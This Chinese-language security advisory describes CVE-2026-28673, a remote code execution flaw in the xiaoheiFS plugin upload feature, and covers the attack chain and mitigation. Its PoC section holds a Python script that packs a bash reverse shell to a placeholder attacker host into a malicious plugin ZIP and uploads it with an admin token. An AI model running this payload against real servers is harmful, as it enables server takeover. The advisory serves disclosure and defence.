IPBUF安全漏洞报告
English
CVE-2026-28673 CVSS 7.2 高危

CVE-2026-28673: xiaoheiFS插件系统远程代码执行漏洞

披露日期: 2026-03-18

漏洞信息

漏洞编号
CVE-2026-28673
漏洞类型
远程代码执行(RCE)
CVSS评分
7.2 高危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
xiaoheiFS

相关标签

远程代码执行插件系统文件上传权限绕过xiaoheiFSCVE-2026-28673

漏洞概述

xiaoheiFS是一款面向云服务业务的自托管财务和运营系统。该系统在0.3.15及之前版本中存在严重的远程代码执行漏洞。漏洞源于系统的标准插件功能允许管理员上传ZIP压缩包,其中包含二进制文件和manifest.json配置文件。服务器在处理插件上传时,过度信任manifest.json文件中声明的binaries字段,直接执行指定的二进制文件,而未对该文件的内容、来源或行为进行任何安全验证。攻击者利用此漏洞可在上传精心构造的恶意插件后,在服务器上以高权限执行任意代码,最终可能导致服务器完全沦陷、敏感数据泄露以及系统被进一步渗透。由于该漏洞需要管理员权限才能利用,因此主要威胁对象为内部恶意管理员或已获取管理员凭据的攻击者。

技术细节

漏洞存在于xiaoheiFS的插件上传功能模块。当管理员通过系统界面上传插件ZIP包时,后端会解压文件并读取其中的manifest.json配置。manifest.json包含binaries字段,用于指定需要执行的二进制文件路径。问题在于服务器端在接收到binaries字段指定的可执行文件后,直接使用系统命令执行该文件,而没有进行以下安全检查:1) 二进制文件的签名或完整性校验;2) 二进制文件的来源验证;3) 沙箱环境下的行为测试;4) 文件类型的白名单限制。攻击者可以构造一个包含恶意二进制文件(如反弹shell脚本或命令执行工具)和相应manifest.json的ZIP包,通过插件上传功能触发服务器的远程代码执行。攻击者利用此漏洞可获得与Web服务相同权限的服务器命令执行能力。

攻击链分析

STEP 1
步骤1
攻击者获取xiaoheiFS的管理员访问权限或冒充恶意管理员
STEP 2
步骤2
攻击者构造包含恶意二进制文件和manifest.json的ZIP插件包
STEP 3
步骤3
通过系统插件上传功能将恶意ZIP文件上传至服务器
STEP 4
步骤4
服务器解压ZIP包,读取manifest.json中的binaries字段
STEP 5
步骤5
服务器直接执行binaries字段指定的恶意二进制文件
STEP 6
步骤6
攻击者获得服务器远程代码执行能力,实现反弹shell或持久化控制

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import zipfile import os import requests # 构造恶意插件ZIP文件 plugin_name = "malicious_plugin" malicious_binary = "#!/bin/bash\n/bin/bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" manifest = '''{ "name": "%s", "version": "1.0.0", "binaries": ["./malicious.sh"] }''' % plugin_name # 创建ZIP文件 with zipfile.ZipFile('%s.zip' % plugin_name, 'w') as zf: zf.writestr('manifest.json', manifest) zf.writestr('malicious.sh', malicious_binary) # 上传恶意插件 url = "https://TARGET_URL/api/plugin/upload" files = {'file': open('%s.zip' % plugin_name, 'rb')} headers = {'Authorization': 'Bearer ADMIN_TOKEN'} response = requests.post(url, files=files, headers=headers) print(response.text)

影响范围

xiaoheiFS <= 0.3.15

防御指南

临时缓解措施
如果无法立即升级,可临时禁用插件上传功能,限制非必要管理员账户的操作权限,并加强对管理员操作的审计日志记录。同时建议在网络层部署WAF和IPS设备,对异常的上传行为进行监控和阻断。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表